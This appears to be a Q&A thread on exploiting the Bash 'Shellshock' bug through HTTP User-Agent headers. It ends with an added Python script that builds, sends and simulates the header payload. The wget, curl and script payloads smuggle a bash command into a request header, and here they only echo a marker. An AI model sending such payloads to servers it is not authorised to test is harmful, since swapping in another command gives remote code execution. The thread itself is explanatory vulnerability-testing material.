
Odds are that you're already aware of the newly discovered Bash bug. It can be tested using `env x='() { :;}; echo vulnerable' bash -c "echo this is a test"`.

What I still haven't understood is what the real attack scenarios of this vulnerability are. I have read that most likely it's going to be HTTP requests, but how?

Deer Hunter
The Illusive Man

1 Answer


The easiest way to test a web server via HTTP request is to inject the bash command through the user agent. Example:

$ wget -U '() { :;}; /bin/bash -c "echo vulnerable"' http://example.com/some-cgi-script

If a 5XX server error is generated, it means that the server is probably vulnerable to an exploit. For possible attack scenarios, please refer to this answer

Please test this on your own servers - trying this on other people's servers may get you in trouble.

Question Overflow
  • On OSX without `wget`, try `curl -A '() { :;}; /bin/bash -c "echo vulnerable"' http://example.com/some-cgi-script` – user193130 Sep 25 '14 at 15:27
  • I get a 301 server error. I probably don't understand the above code, but does http://example.com/some-cgi-script point to code on the victim's server or on the attacker's server (and contain malicious code)? – Matt Parkins Sep 26 '14 at 11:17
  • @MattParkins, example.com is the server under attack. some-cgi-script is a script on example.com that enables the exploit to work. A 301 error means the client got redirected. – Question Overflow Sep 26 '14 at 11:30
  • Thanks - so how does the attacker get the CGI script onto the victim's web server? I think that's what I'm not understanding. – Matt Parkins Sep 26 '14 at 13:39
  • @MattParkins, no, the CGI script is hosted by the victim, not inserted by the attacker. – Question Overflow Sep 27 '14 at 07:39
  • Ah, ok, I see my mixup. I was thinking http://example.com/some-cgi-script was a malicious script and didn't know how an attacker could get it on a victim's server, but actually it doesn't matter what CGI script is called. Does it matter if the CGI script is actually there? – Matt Parkins Sep 29 '14 at 09:50
  • @MattParkins, yes, a CGI script must be present for such an attack. – Question Overflow Oct 01 '14 at 05:02
  • An example would be `http://example.com/script.cgi`; replace `example.com` and `/script.cgi` with your own address and CGI script (the script located on the server, not your computer). – Karl Morrison Oct 02 '14 at 06:07
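As an added example (my own code, not part of the original answer or written by its author), the following Python script packages the User-Agent test from the answer above: it builds the payload, classifies the response, and simulates locally what a CGI gateway does with the header, so the mechanism can be seen without touching any server. The function names, the marker scheme and the `script_cmd` stand-in for a CGI script are my own assumptions. The payload adds `echo; echo` so that the injected command's output lands in the response body instead of corrupting the CGI header block; the corrupted header block is what usually produces the 5XX the answer relies on, and a body marker is a more reliable signal than the status code alone.

```python
"""Probe helpers for the Bash (Shellshock) CGI test described above.

Added example, not the original answer's code.  A CGI web server copies request
headers into environment variables (User-Agent -> HTTP_USER_AGENT) before it
runs the script; a vulnerable bash then executes whatever follows the function
body in that variable.
"""
import os
import shutil
import subprocess
import urllib.error
import urllib.request
import uuid
from typing import Optional


def build_payload(marker: str) -> str:
    """Return a User-Agent value that echoes `marker` on a vulnerable bash.

    The two leading `echo`s emit a blank line, ending the CGI header block so the
    marker is returned as body text (otherwise the gateway answers 5XX).
    """
    return f'() {{ :;}}; echo; echo; /bin/bash -c "echo {marker}"'


def classify_response(status: int, body: str, marker: str) -> str:
    """Interpret a probe response: marker in body is proof, 5XX is only a hint."""
    if marker in body:
        return "vulnerable"
    if 500 <= status <= 599:
        return "probably vulnerable"  # injected output likely broke the CGI headers
    return "no evidence"  # includes 200/301/404: the script may not exist or be CGI


def simulate_cgi(user_agent: str, script_cmd: str = "echo this is a test") -> Optional[str]:
    """Do locally what a CGI gateway does: export the header, then run bash.

    `script_cmd` stands in for the CGI script (assumption: a bash one-liner).
    Returns bash's stdout, or None when no bash is installed.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ, HTTP_USER_AGENT=user_agent)
    proc = subprocess.run([bash, "-c", script_cmd], env=env,
                          capture_output=True, text=True, check=False)
    return proc.stdout


def probe(url: str, marker: Optional[str] = None, timeout: float = 10.0) -> str:
    """Send the User-Agent test to `url` (your own server) and classify the result.

    urllib follows redirects, so a 301 like the one in the comments is resolved
    to the final response rather than reported as an error.
    """
    marker = marker or "probe-" + uuid.uuid4().hex[:12]
    req = urllib.request.Request(url, headers={"User-Agent": build_payload(marker)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    return classify_response(status, body, marker)


if __name__ == "__main__":
    # Offline demonstration: an unpatched bash prints the marker before the
    # script's own output; a patched bash treats HTTP_USER_AGENT as plain text.
    print(repr(simulate_cgi(build_payload("vulnerable"))))
    # Online use, against a server you own (URL is a placeholder):
    # print(probe("http://example.com/some-cgi-script"))
```

Run the file to see the local simulation; on a patched bash only `this is a test` comes back, on an unpatched one the marker appears first. Only point `probe()` at servers you are authorised to test, as the answer says.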